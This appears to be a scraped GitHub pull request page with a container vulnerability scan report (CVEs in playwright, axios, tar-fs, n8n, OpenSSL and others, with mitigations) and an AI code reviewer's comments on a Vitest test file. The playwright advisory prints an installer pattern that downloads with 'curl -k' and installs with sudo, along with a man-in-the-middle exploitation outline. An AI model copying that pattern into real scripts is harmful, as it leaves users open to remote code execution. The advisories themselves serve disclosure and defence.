    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
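
Until such a fix lands in axios itself, a caller-side guard is one way to apply the same size-limit idea; a minimal sketch (the helper name and threshold are illustrative, not from the advisory):

// Hypothetical helper: reject oversized data: URIs before handing them to axios.
const MAX_DATA_URI_BYTES = 8 * 1024; // illustrative limit

function assertDataUriWithinLimit(url) {
  if (typeof url === 'string' && url.startsWith('data:')) {
    const payload = url.slice(url.indexOf(',') + 1);
    // Base64 expands data by ~4/3, so decoded size is roughly payload.length * 3/4.
    const approximateDecodedBytes = Math.floor(payload.length * 0.75);
    if (approximateDecodedBytes > MAX_DATA_URI_BYTES) {
      throw new Error(`data: URI too large (~${approximateDecodedBytes} bytes decoded)`);
    }
  }
}

// Usage sketch: call assertDataUriWithinLimit(url) before axios.get(url, ...).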

critical: 0 high: 1 medium: 0 low: 0 playwright 1.54.2 (npm)

pkg:npm/playwright@1.54.2

high 8.7: CVE-2025-59288 (Improper Verification of Cryptographic Signature)

Affected range: <1.55.1
Fixed version: 1.55.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Score: 0.027%
EPSS Percentile: 6th percentile
Description

Summary

Use of curl with the -k (or --insecure) flag in installer scripts allows attackers to deliver arbitrary executables via Man-in-the-Middle (MitM) attacks. This can lead to full system compromise, as the downloaded files are installed as privileged applications.

Details

The following scripts in the microsoft/playwright repository at commit bee11cbc28f24bd18e726163d0b9b1571b4f26a8 use curl -k to fetch and install executable packages without verifying the authenticity of the SSL certificate:

In each case, the shell scripts download a browser installer package using curl -k and immediately install it:

curl --retry 3 -o ./<pkg-file> -k <url>
sudo installer -pkg /tmp/<pkg-file> -target /

Disabling SSL verification (-k) means the download can be intercepted and replaced with malicious content.

PoC

A high-level exploitation scenario:

  1. An attacker performs a MitM attack on a network where the victim runs one of these scripts.
  2. The attacker intercepts the HTTPS request and serves a malicious package (for example, a trojaned browser installer).
  3. Because curl -k is used, the script downloads and installs the attacker's payload without any certificate validation.
  4. The attacker's code is executed with system privileges, leading to full compromise.

No special configuration is needed: simply running these scripts on any untrusted or hostile network is enough.

Impact

This is a critical Remote Code Execution (RCE) vulnerability due to improper SSL certificate validation (CWE-295: Improper Certificate Validation). Any user or automation running these scripts is at risk of arbitrary code execution as root/admin, system compromise, data theft, or persistent malware installation. The risk is especially severe because browser packages are installed with elevated privileges and the scripts may be used in CI/CD or developer environments.

Fix

Credit

  • This vulnerability was uncovered by tooling by Socket
  • This vulnerability was confirmed by @evilpacket
  • This vulnerability was reported by @JLLeitschuh at Socket

Disclosure

critical: 0 high: 1 medium: 0 low: 0 openssh 10.0_p1-r7 (apk)

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high: CVE-2023-51767

Affected range: <=10.0_p1-r7
Fixed version: Not Fixed
EPSS Score: 0.008%
EPSS Percentile: 1st percentile
Description
critical: 0 high: 1 medium: 0 low: 0 axios 1.8.3 (npm)

pkg:npm/axios@1.8.3

high 7.5: CVE-2025-58754 (Allocation of Resources Without Limits or Throttling)

Affected range: >=1.0.0, <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.025%
EPSS Percentile: 5th percentile
Description

Same advisory text as the CVE-2025-58754 entry for axios 1.11.0 above.

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE-2025-59343 (Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'))

Affected range: >=2.0.0, <2.1.4
Fixed version: 2.1.4
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.024%
EPSS Percentile: 5th percentile
Description

Impact

Affects v3.1.0, v2.1.3, v1.16.5 and below.

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }
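
A minimal usage sketch of that workaround with tar-fs extraction (the archive path and destination directory are assumptions):

const fs = require('fs');
const tar = require('tar-fs');

// Extract an archive but skip anything that is not a plain file or directory (e.g. symlinks).
fs.createReadStream('./archive.tar').pipe(
  tar.extract('./output-dir', {
    ignore(_, header) {
      return header.type !== 'file' && header.type !== 'directory';
    },
  }),
);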

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 n8n 1.109.2 (npm)

pkg:npm/n8n@1.109.2

high 8.8: GHSA-365g-vjw2-grx8 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))

Affected range: <=1.114.4
Fixed version: Not Fixed
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Same advisory text as the GHSA-365g-vjw2-grx8 entry for n8n-nodes-base 1.107.0 above.

critical: 0 high: 1 medium: 0 low: 0 openssl 3.5.2-r0 (apk)

pkg:apk/alpine/openssl@3.5.2-r0?os_name=alpine&os_version=3.22

high: CVE-2025-9230

Affected range: <3.5.4-r0
Fixed version: 3.5.4-r0
EPSS Score: 0.026%
EPSS Percentile: 6th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 expat 2.7.1-r0 (apk)

pkg:apk/alpine/expat@2.7.1-r0?os_name=alpine&os_version=3.22

high: CVE-2025-59375

Affected range: <2.7.2-r0
Fixed version: 2.7.2-r0
EPSS Score: 0.102%
EPSS Percentile: 29th percentile
Description


@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 1

📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 9345894 and f629b57.

📒 Files selected for processing (1)
  • workers/main/src/index.test.ts (2 hunks)
🧰 Additional context used
📓 Path-based instructions (2)
**/*.test.ts

📄 CodeRabbit inference engine (CLAUDE.md)

Tests are co-located with source files and should be named with the pattern *.test.ts

Files:

  • workers/main/src/index.test.ts
**/*.{ts,tsx}

📄 CodeRabbit inference engine (CLAUDE.md)

**/*.{ts,tsx}: Follow the function naming pattern: prefix? + action (A) + high context (HC) + low context? (LC), using action verbs such as get, fetch, send, create, validate, handle, calculate, and boolean prefixes is, has, should
Use descriptive, unabbreviated variable names; use singular for single values and plural for collections; ensure variable names are context-specific

Files:

  • workers/main/src/index.test.ts
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
  • GitHub Check: Docker Security Scanning (temporal, Dockerfile.temporal, temporal-test:latest)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
  • GitHub Check: SonarQube
🔇 Additional comments (1)
workers/main/src/index.test.ts (1)

19-20: LGTM: Proper timer cleanup.

The cleanup properly clears pending timers and restores real timers, following best practices for test isolation. This is good test hygiene, though it's only necessary if fake timers are actually being used.

Comment on lines +9 to +10
vi.useFakeTimers();

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

Verify timer usage in handleRunError implementation.

Fake timers are configured but the tests don't explicitly advance or control them. If handleRunError uses timers (e.g., delayed process.exit), the tests should verify that behavior with vi.advanceTimersByTime() or vi.runAllTimers(). If it doesn't use timers, this setup adds unnecessary overhead.

Run the following script to check if handleRunError uses timer functions:


🏁 Script executed:

#!/bin/bash
# Description: Check if handleRunError implementation uses setTimeout, setInterval, or other timer functions

# Search for handleRunError implementation and timer usage
ast-grep --pattern 'function handleRunError($$$) {
  $$$
}'

# Also search for timer-related calls in the index.ts file
rg -n 'setTimeout|setInterval|clearTimeout|clearInterval' workers/main/src/index.ts

Length of output: 44


I need to check the actual test implementations to see if they're advancing timers or if they're missing this critical step.


🏁 Script executed:

#!/bin/bash
# View the handleRunError implementation and surrounding context
cat workers/main/src/index.ts | head -60 | tail -20

echo "---"

# View the full test file to see if timers are being advanced
cat workers/main/src/index.test.ts

Length of output: 1929


Tests must verify the 100ms process.exit behavior when fake timers are enabled.

The test setup enables fake timers and mocks process.exit, but the tests never advance timers to trigger the setTimeout callback. Without calling vi.advanceTimersByTime(100) or vi.runAllTimers(), the process.exit(1) is never invoked and remains untested. Each test should advance timers after calling handleRunError() and verify that process.exit(1) was called.

Example fix:

it('should exit with code 1 after 100ms', () => {
  const error = new Error('test error');
  const logSpy = vi.spyOn(logger, 'error').mockImplementation(() => {});

  handleRunError(error);
  expect(logSpy).toHaveBeenCalledWith(
    `Error in main worker: ${error.message}`,
  );
  
  vi.advanceTimersByTime(100);
  expect(processExitSpy).toHaveBeenCalledWith(1);
  
  logSpy.mockRestore();
});
🤖 Prompt for AI Agents
In workers/main/src/index.test.ts around lines 9-10, tests enable fake timers
but never advance them so the 100ms setTimeout that calls process.exit(1) is
never executed; update each relevant test to advance timers (e.g.,
vi.advanceTimersByTime(100) or vi.runAllTimers()) after invoking
handleRunError(), then assert that the mocked process.exit was called with 1,
and restore any spies/mocks.

- Introduced a new docker-compose.local.yml file for local development, enabling SSH tunneling for Redmine and MongoDB services.
- Updated README.md to include instructions for using the new local development configuration, clarifying the usage of different docker-compose files for various environments.

These changes enhance the development workflow by providing a dedicated configuration for local setups.
- Implemented fake timers using vi.useFakeTimers() to control setTimeout behavior during tests.
- Restored real timers and cleared pending timers in afterEach to ensure a clean test environment.

These changes improve the reliability of tests by preventing unintended delays and ensuring proper timer management.
@anatolyshipitz anatolyshipitz force-pushed the chore/docker-compose-local-explicit branch from f629b57 to 8b253f4 on October 29, 2025 09:45
@anatolyshipitz anatolyshipitz marked this pull request as draft October 29, 2025 09:45
@sonarqubecloud

1 similar comment
@sonarqubecloud

sonarqubecloud bot commented Dec 3, 2025
